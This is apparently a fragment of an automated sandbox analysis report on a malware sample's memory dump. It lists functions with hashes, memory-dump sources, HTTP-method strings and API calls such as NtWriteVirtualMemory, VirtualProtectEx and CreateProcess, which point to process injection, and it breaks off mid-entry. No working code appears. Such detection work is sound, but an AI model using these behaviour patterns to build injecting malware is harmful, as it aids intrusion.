                                                                                                                                              • Instruction ID: 622143fb91b31246beaefc27849fedf937af71170f1ea1f57b5064a0686e5a78
                                                                                                                                              • Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                              • Instruction Fuzzy Hash: 7A212C34718B088FE794FF29E88966677E1FB9C351F10456AA84DC3261EB34D885CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 436179556-0
                                                                                                                                              • Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                              • Instruction ID: 098a7026994c20e78fb5c93fef0379f2404833804403dc78a80ca69c9576b97b
                                                                                                                                              • Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                              • Instruction Fuzzy Hash: CA018030618A488FDB54EB5C94C866ABBE1FBE8301F10446EE88DC3365DAB5C9418783
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateQueueThreadUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3600083758-0
                                                                                                                                              • Opcode ID: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
                                                                                                                                              • Instruction ID: 81ec9eb57f084c14967b5e5cff290b3fed0b186e5c140ddfb05b0aec323aadfa
                                                                                                                                              • Opcode Fuzzy Hash: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
                                                                                                                                              • Instruction Fuzzy Hash: CA017531714A194FAF44EF2CA84D77977E2EBAC711704857AE509C32B0DB34DC428B81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                              • Instruction ID: b510b78220744653e9704a3ad389f21ea1f1b9ea7298194fdddb18158124ae25
                                                                                                                                              • Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                              • Instruction Fuzzy Hash: 1161633061CE099FD794EF18D885A66B7E1FB6C305B60459EE84AC3261DF34EC41CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
                                                                                                                                              • Instruction ID: 0c5730fa61c6222e6493de343ee31c8f5801ecf9b523ec2bc4e014c41e798caf
                                                                                                                                              • Opcode Fuzzy Hash: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
                                                                                                                                              • Instruction Fuzzy Hash: 70314F7060CB084FDB58EF1CD885665B7E1FB99311F10466EE84DC3261DA70EC418B86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
                                                                                                                                              • Instruction ID: 0adb4dc801df6d008924a4c6b0a3bdd5e10f38a2bc812736980a0212cae89a95
                                                                                                                                              • Opcode Fuzzy Hash: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
                                                                                                                                              • Instruction Fuzzy Hash: BC3150303586858FAB69EF29ECD592A73E2FB983407645079A45BC3651DF38EC03CB52
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RtlDeleteBoundaryDescriptor.NTDLL ref: 00B879B2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BoundaryDeleteDescriptor
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3203483114-0
                                                                                                                                              • Opcode ID: d4ddd70a20fe12c0bfca40bb4ed08bb38bc6dfc5d20d157000875d94b5c8c612
                                                                                                                                              • Instruction ID: 94ef905e2d267f30f40e07c400a6f03914d86653977c4c152c47daa40866e50c
                                                                                                                                              • Opcode Fuzzy Hash: d4ddd70a20fe12c0bfca40bb4ed08bb38bc6dfc5d20d157000875d94b5c8c612
                                                                                                                                              • Instruction Fuzzy Hash: C721833071890C4FDB98EF69A895679B3E2F798301B20456DE55FC3261DF28DC56C782
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                              • Instruction ID: e5a557da5dc821d48062cd15ceb0248ac0790d445d6c06908f97b523be193d2c
                                                                                                                                              • Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                              • Instruction Fuzzy Hash: 97117F3120CA088FAF18EF59A8850A5B7E5EB9C316700497DE94EC3355EA30ED05CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00B9A864: RegCreateKeyA.ADVAPI32 ref: 00B9A887
                                                                                                                                              • RegQueryValueExA.KERNELBASE ref: 00B863E2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2711935003-0
                                                                                                                                              • Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                              • Instruction ID: ca7bc96850ae81fc21dc908e7c60c96869a85faeb983c8c516ce98ff46f03867
                                                                                                                                              • Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                              • Instruction Fuzzy Hash: 2D21603011CB488FEB55EF64D888A6AB7E1FB98305F50096EF48AC3260EBB4D545CB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00B83830: NtWriteVirtualMemory.NTDLL ref: 00B8384F
                                                                                                                                              • VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B7FBE4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$MemoryProtectWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1789425917-0
                                                                                                                                              • Opcode ID: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
                                                                                                                                              • Instruction ID: da4e9212ed03563fb6d072b84d39b3bd6fd29b6cf2aeea0ef1eb79574d365bf6
                                                                                                                                              • Opcode Fuzzy Hash: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
                                                                                                                                              • Instruction Fuzzy Hash: 12015A70618B088FCB48EF98A0C552AB7E0EB9C310B4045AEE84DC7356CA70DD45CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • FindCloseChangeNotification.KERNELBASE ref: 00B7A97D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                              • Opcode ID: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
                                                                                                                                              • Instruction ID: a72c4c2bb37b7edcd7ede9386c0ac3a528dc7fcec7d305ccc6292a396aeea1ba
                                                                                                                                              • Opcode Fuzzy Hash: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
                                                                                                                                              • Instruction Fuzzy Hash: F6F06235318B494BEB9CDF69D488A2EB7E1FBD8301F54992DB64AC3254DF74C8058B02
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1534048567-0
                                                                                                                                              • Opcode ID: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
                                                                                                                                              • Instruction ID: a8e86f8f7a0d01a36c672041ab43f2287e59b4031ad7054791236eb315e76aae
                                                                                                                                              • Opcode Fuzzy Hash: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
                                                                                                                                              • Instruction Fuzzy Hash: 2261717061CB499FCB58DF18C885A7AB7F1FB98714F14467EE48A83211DB30E956CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                                                                                                              • API String ID: 0-647159250
                                                                                                                                              • Opcode ID: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
                                                                                                                                              • Instruction ID: d82dbf8b094a2e0aa6d7b2a481a4fc40f082d374c7917456e7a883ef8c3eb4cc
                                                                                                                                              • Opcode Fuzzy Hash: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
                                                                                                                                              • Instruction Fuzzy Hash: C212A730218B098FDB69FF38D899AA673E1FB99311F14456DD48AC3265DF34E846CB81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: rGet$rLoa$~
                                                                                                                                              • API String ID: 0-56615508
                                                                                                                                              • Opcode ID: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
                                                                                                                                              • Instruction ID: 5a06b479a4920fc64bc8c4f2c70aeac5a988cc00a5a44f7254f77aea0a28729d
                                                                                                                                              • Opcode Fuzzy Hash: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
                                                                                                                                              • Instruction Fuzzy Hash: 5CE1E930618B0A8FD728EF68D8856B677E1FB98310F14457DD48BC3265EB34D846C782
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: K$P
                                                                                                                                              • API String ID: 0-420285281
                                                                                                                                              • Opcode ID: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
                                                                                                                                              • Instruction ID: f7eaad848051bf68459280f01999907c4214dd4fe7b07ecfde6d8b44a3a12db0
                                                                                                                                              • Opcode Fuzzy Hash: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
                                                                                                                                              • Instruction Fuzzy Hash: 5941B23151CB88CFCB85EF5C848461BBBE0FBA9305F140A9DE489C7252C774CA49C792
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: W
                                                                                                                                              • API String ID: 0-655174618
                                                                                                                                              • Opcode ID: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
                                                                                                                                              • Instruction ID: e884ce8618f440503380ab072668f2fdb5c75b9f7b832f6bbff7a9b81c85a5a8
                                                                                                                                              • Opcode Fuzzy Hash: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
                                                                                                                                              • Instruction Fuzzy Hash: 1A429131718A188FDB68FF68DCC95B973E2E799300B18456DD48BC3265EE34E946C782
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              • Opcode ID: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
                                                                                                                                              • Instruction ID: 6b38b3e6fd17e5f4a8298b5f41dc79600d5bb535be4bbfe3d7f440e99117cf41
                                                                                                                                              • Opcode Fuzzy Hash: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
                                                                                                                                              • Instruction Fuzzy Hash: BF529930618B498FEB64EF28E899B6A77E1FB98301F44857DD48AC3261DF78D941CB41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: vids
                                                                                                                                              • API String ID: 0-3767230166
                                                                                                                                              • Opcode ID: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
                                                                                                                                              • Instruction ID: 06c5b4078834785fa5f9d34f8d04333eddbdc6fc8733d2b94101fac20946d8bc
                                                                                                                                              • Opcode Fuzzy Hash: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
                                                                                                                                              • Instruction Fuzzy Hash: CBC14C7161C7448FD768EF28C455BAAB7E1FB95311F10896DE49AC3261DF34E806CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: P
                                                                                                                                              • API String ID: 0-3110715001
                                                                                                                                              • Opcode ID: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
                                                                                                                                              • Instruction ID: c19f389c5c95411f8bffe33ff55f47e70379d8d86458d789d56ef2c4401bd978
                                                                                                                                              • Opcode Fuzzy Hash: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
                                                                                                                                              • Instruction Fuzzy Hash: C8A1E230648A098FEB65EF2CD88976A73E5FB98301F14816DD45EC32A1DF38D846CB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
                                                                                                                                              • Instruction ID: 95cb6908c4cdc7c9aa71a574db5ee373aa371b92b70e0b9a891d551ae6b11829
                                                                                                                                              • Opcode Fuzzy Hash: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
                                                                                                                                              • Instruction Fuzzy Hash: AF426B767B82804B974CC918DCA36F932DAE7C631E71CA43DE9C7C6247EA29D5078948
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
                                                                                                                                              • Instruction ID: 05e57cd502394cf0e256ecafd39e09efef51aa7487acec867e5fc811feede484
                                                                                                                                              • Opcode Fuzzy Hash: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
                                                                                                                                              • Instruction Fuzzy Hash: 7C720D30618B448FDB79EF28C495A6EB7E2FBD8701F14896EE19EC3254DB309941DB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
                                                                                                                                              • Instruction ID: 1559b60f5e2768a89eeec2e37c2971beb4367f3ce72d81f2d1142f57061612ed
                                                                                                                                              • Opcode Fuzzy Hash: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
                                                                                                                                              • Instruction Fuzzy Hash: 3B52E030524A448FCB6DCF1CC4C56B437E5FB4A314B6452BDDC8ACB25BEA399886CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd3136d2289194873e33efb2f48f157972e675c37aa1850b7e11595ba4bc6e77
                                                                                                                                              • Instruction ID: 636aa841029a821c6e2ec9a2b1eabd11708161295e6e46a963c9b3ee473d2c3a
                                                                                                                                              • Opcode Fuzzy Hash: cd3136d2289194873e33efb2f48f157972e675c37aa1850b7e11595ba4bc6e77
                                                                                                                                              • Instruction Fuzzy Hash: 4B12E570658B599FC31DDF28C4856E4B7E0FB55308F1085ADD8EB83602DB26E466CBC2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
                                                                                                                                              • Instruction ID: f1d844ad3223687af90833043739d0d409122c7a261ea795b714ea6a32ac9b41
                                                                                                                                              • Opcode Fuzzy Hash: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
                                                                                                                                              • Instruction Fuzzy Hash: C3125530614F9AAFCB0EDF28C4855A8B7E1FB59319B1042A9C466C3A51E735F866CFC4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
                                                                                                                                              • Instruction ID: c4e8d813fa907563660787f46b1f7e5974f2e662ae622db3c2afbc407e5c9e99
                                                                                                                                              • Opcode Fuzzy Hash: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
                                                                                                                                              • Instruction Fuzzy Hash: FFF13770214A0A8BD72DAF2CD8852B573F1FF94359F1482BED59FC2195EA34D847C682
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
                                                                                                                                              • Instruction ID: 8632da25146b54da8d2f6eaaa7f89541456a21fc3ef20b2c68df07a42958cadf
                                                                                                                                              • Opcode Fuzzy Hash: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
                                                                                                                                              • Instruction Fuzzy Hash: A0E12931618A854FDB0D9E3CD9962B47BE1FB95324B2882BDE8DBC3387D52998078741
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
                                                                                                                                              • Instruction ID: d8577c6139fee5a30c6acd5485aeb8e23766bfe276fd7a48e6eed195dee81481
                                                                                                                                              • Opcode Fuzzy Hash: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
                                                                                                                                              • Instruction Fuzzy Hash: 15D12B34258A4D4FEB1DAF18D8C22B577D2F756300F5442AED5C7C32A2DA25E853CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
                                                                                                                                              • Instruction ID: a3ac2192ae57bc3f5ce0e959acfb2699bf781a826dca9872d49c6738632ac553
                                                                                                                                              • Opcode Fuzzy Hash: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
                                                                                                                                              • Instruction Fuzzy Hash: 22D1E63061CB188FDB18EF29D8C9669B7E1F798700F54457DE58AC3262DE34E946CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
